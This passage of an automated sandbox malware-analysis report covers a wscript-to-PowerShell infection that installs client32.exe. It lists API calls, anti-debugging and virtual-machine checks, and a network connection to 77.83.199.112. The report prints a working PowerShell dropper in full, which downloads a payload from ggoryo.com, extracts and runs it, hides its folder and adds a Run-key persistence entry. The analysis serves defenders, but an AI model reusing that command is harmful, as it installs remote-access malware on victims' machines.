CuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMS
Source: TCCTL32.DLL.8.dr Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 0000000A.00000003.1539891812.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.0000000005997000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523977080.0000000005992000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526874385.0000000005990000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnD
Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwqQlqscfvhvLKUmoCJTUjavgmbKBLMFpvEFsrJtdVVvtcmuwHTEMvBDXgipznDWsaHTvtYDQcOofS
Source: wscript.exe, 00000000.00000003.1346975876.000001FC57262000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1830086610.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1526350208.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1536730787.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1539453940.00000000059A8000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000003.1523563518.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 0000000A.00000002.2491283544.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.8.dr Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.8.dr Binary or memory string: VMWare
Source: wscript.exe, 00000000.00000003.1356978287.000001FC57DCF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: xOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwqQlqscfvhvLKUmoCJTUjavgmbKBLMFpvEFsrJtdVVvtcmuwHTEMvBDXgipznDWsaHTvtYDQcOof
Source: wscript.exe, 00000000.00000003.1348423839.000001FC57BD1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfwS
Source: wscript.exe, 00000000.00000003.1356978287.000001FC57E51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vvnfgZFOzESEePpLVEdahceGxirGantREzNXYLrxQxvvDNFCAzzDVEHTdSuWIHAKTMbpyuAPqpoxOIRGTKJZHxVIiMorMCzWfwegjeUDIvuDbfNSqvdLFyCxVKsjmNaPsVTxbhvBPxqCLDTJsiuLfNtRlsEiWdRjCclGFyPaDuNqLGDuMWUXmDvseghDVZxfzgawcDJNCqIBCpzhYriTwASvvCEIJQVNAXlPORcVxtTkZHwcDReEluWtHbBxbayANwMXrkEVwEUDTuvDGiWtPkxpFleOjiyjWDEpoICeZomWLvPaOGVHdzfwObZPtbkANeyqPUndSEotGFOsZNWqtDAUZJDHSVCcbXkMOFXCdRSKDoXyUpLhHsxhLZFMexaYIbDdGidpCQUbXEFIANKIPzlCHCNRrSlKOoBciNvBaCiKolfbzaiPlhChNmHsnkgfefeECaAQjaVPsZYzYIUkIZuOjphCfVIGDcwfazQByQJfBaPjLGEAVdxWEVoJiAuXmbIvLRrdpYGvSjgrSSKrTqYWJhlBhGCeJgTesAPUWyOLwDqepbFeZUOrfNiUuvEZyOamtngXLlNXwNOTLoPWBGWCmhDqtapCuAdwVlzZGIECrrCDtFsBEsTDUiGxBRrTOOdDTKOJiPvuLlEcvYavDYOwsSvWgwPldeeGtELvCLVFEtzkidfPutHWbUJhQcNgAohGFsSOdHlwBJWKOgGoSEQxoHXxMEmceyunawzTXuATqyKuBdqDhHxCehwyGFamkLwZALsxTYagUJFlrjPBwFFZGyMGSheMNRFpkaWDMVaGRwxDfvJzZkpQwcaFwCHnnAlfkjNMWcelVOGSgvLMxodYHRWHufGAojPDealwEKZluyLGeflVXfYskNMdfFiJPGjTcvbVAMzBzGorDpEYaIadRmIBCdnczPiPTCQHyhRRtfruEFVlrUTseQPkMZhTsQYTtiOFHtJNpeylFhkzfoNqBRAvSkElYlwlGFIuNMPXicjOgmWzhLvoWqXxofrbtodxIOBvtoAZyigpHtzVOyHAQweogiowYzmgLheppgcgDXJYhptekwwyHrTMWvblqiDSXdUXXnFAtilfpuykHeddZNHFBqScsyMixLFUTDBrIYSkUAtMXQXlqNohLyzfnGBIuHOlfArCmnNcnoXVahHBezDoOjBCjlpBXHwIMRIzEjZMGYPhZORYagLjxZcCRFlwaCNAvwEZfevKOiOAzkMXyAbfocEEEwextPTpCGjMmMqMtSbVvuNlmVuByLVByHCATlRgizBZViWjARkfWMKRGBWYQSiisCnNbNVpVMDXLXDtbMdXCspTdXhvvZuJzjgfcJdDvVEgsSrAhZaErRyqMouKXWmlyZIYSHkGWMfNIXQRUGNfIZgbVgQJbAiIzLJDeClIZZGgQqvgMwxpjUMmCDHiloYlMSvAUHTvaARlothFoReDneuWyhUFsuLJPnDgtXLVFyWvvMdUyyowpknwcjGyfhzhUWTmWuHtdzVlNhQgZqNfMCDiHXrcYndLhUQDrdWvIqffaANUXBivhUGcNyGVevxEBZSxGTyQXUrTiByIBMIZmkDOVGrLOULRtwiuLdTzLTFnXLNtlnLwFctLTHbxKQtFUoLZPSgJvxtAnUpTdAddPdRhplnfuZeqiHsAwvEyVIMTMBJeJqyiYlpogvRpJmSvrcfhqfyJYkrnIySCFhFHriGcoKvQYrIAmrjseiogmjMQKNKqGlKtmxiZvVPgcEbXmdCEeATesgaLusembdMkUaxFAlndqTTKrEYVLJndqkuREwsdouqLmiFQyzRvvrYVlepCTDtAqaBVqbVcRNsAVBgAwhFQnHZtwOutGgrjglykXnobrlMpBxhXmxGZcUtxcpZALkGEYtkVjBroCZIFRLHDawgjRtfCEAiUrBwKKvmJEUDCfrroaNSFluJwkKBdMFTOCWHuuAdiBdREkKSRYiKEueiYxVgWMtJDrDXPcYBMmLqQMDKSLLKqWPTVxFGneAYLaVsYJnRvaVYBBFDQilsHvQfw
Source: powershell.exe, 00000008.00000002.1840183751.0000026C752E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000008.00000002.1840183751.0000026C751C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_11162BB7
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110B7F30 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,_memset,GetVersionExA,wsprintfA,wsprintfA,_fputs,_fputs,_fputs,_fputs,_fputs,_fputs,wsprintfA,_fputs,_strncat,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA, 10_2_110B7F30
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 10_2_11029BB0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1117D104 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 10_2_1117D104
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 10_2_110934A0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter, 10_2_11031780
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 10_2_11162BB7
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1116EC49 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 10_2_1116EC49

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 77.83.199.112 443 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_110F4990 GetTickCount,LogonUserA,GetTickCount,GetLastError, 10_2_110F4990
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_11113190 GetKeyState,DeviceIoControl,keybd_event, 10_2_11113190
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $VWKXIVYIUK='https://ggoryo.com/trade/da.php?9800';$QBOSAXLNLPU=(New-Object System.Net.WebClient).DownloadString($VWKXIVYIUK);$ZRPU=[System.Convert]::FromBase64String($QBOSAXLNLPU);$asd = Get-Random -Minimum -5 -Maximum 12; $JDKPRJIL=[System.Environment]::GetFolderPath('ApplicationData')+'\EQMIUFUUUCW'+$asd;if (!(Test-Path $JDKPRJIL -PathType Container)) { New-Item -Path $JDKPRJIL -ItemType Directory };$p=Join-Path $JDKPRJIL 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ZRPU);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$JDKPRJIL)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $JDKPRJIL 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $JDKPRJIL -Force; $fd.attributes='Hidden';$s=$JDKPRJIL+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='DIWFE';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe "C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd;
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $vwkxivyiuk='https://ggoryo.com/trade/da.php?9800';$qbosaxlnlpu=(new-object system.net.webclient).downloadstring($vwkxivyiuk);$zrpu=[system.convert]::frombase64string($qbosaxlnlpu);$asd = get-random -minimum -5 -maximum 12; $jdkprjil=[system.environment]::getfolderpath('applicationdata')+'\eqmiufuuucw'+$asd;if (!(test-path $jdkprjil -pathtype container)) { new-item -path $jdkprjil -itemtype directory };$p=join-path $jdkprjil 'cxcc.zip';[system.io.file]::writeallbytes($p,$zrpu);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$jdkprjil)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $jdkprjil 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $jdkprjil -force; $fd.attributes='hidden';$s=$jdkprjil+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='diwfe';$asdasd='string';new-itemproperty -path $k -name $v -value $s -propertytype $asdasd; Jump to behavior
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent, 10_2_1109E5B0
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: 10_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid, 10_2_1109ED30
Source: client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.8.dr Binary or memory string: Progman
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 10_2_11174898
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 10_2_11174B29
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 10_2_11174BCC
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoA, 10_2_1116C24E
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 10_2_11174796
Source: C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 10_2_111746A1
